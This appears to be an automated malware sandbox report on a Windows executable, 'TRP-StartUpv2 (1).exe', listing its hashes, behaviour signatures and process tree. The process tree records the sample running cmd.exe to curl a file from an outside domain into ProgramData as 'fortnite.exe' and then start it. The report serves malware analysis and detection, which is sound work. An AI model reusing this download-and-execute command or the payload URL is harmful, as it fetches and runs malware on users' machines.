Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    07/08/2024, 07:41

General

  • Target

    TRP-StartUpv2 (1).exe

  • Size

    35KB

  • MD5

    0da2fb209d6024901b3526e681567af8

  • SHA1

    6df1d2817c05de8bde8c00096b1bd7b0fd027244

  • SHA256

    f88ec751a1f38a0da6f51d1cdee9bf7363673210d96e3625e472f1bb9af6bb3e

  • SHA512

    931ebc720b38dd3542f9392c9f9efaaf298ff167d9005be9dbe2f0bf39ac2fca36f66f1632007b8b68da510e76dbecfc6ee46e91239a806c1a2fd14aad547e07

  • SSDEEP

    384:25BhTo7cXy7ot5fec3yIuXt2HAYRtT2uPF449DOVM1iYVIy2drcuzl2ARd2d0shZ:KjoKt5fec8AAYtFO5YOW0l2ACvsaL

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TRP-StartUpv2 (1).exe
    "C:\Users\Admin\AppData\Local\Temp\TRP-StartUpv2 (1).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s https://d.serai.pro/fafas.exe -o C:\ProgramData\fortnite.exe > NUL 2>&1
      2⤵
        PID:2848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start C:\ProgramData\fortnite.exe > NUL 2>&1
        2⤵
          PID:2840

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads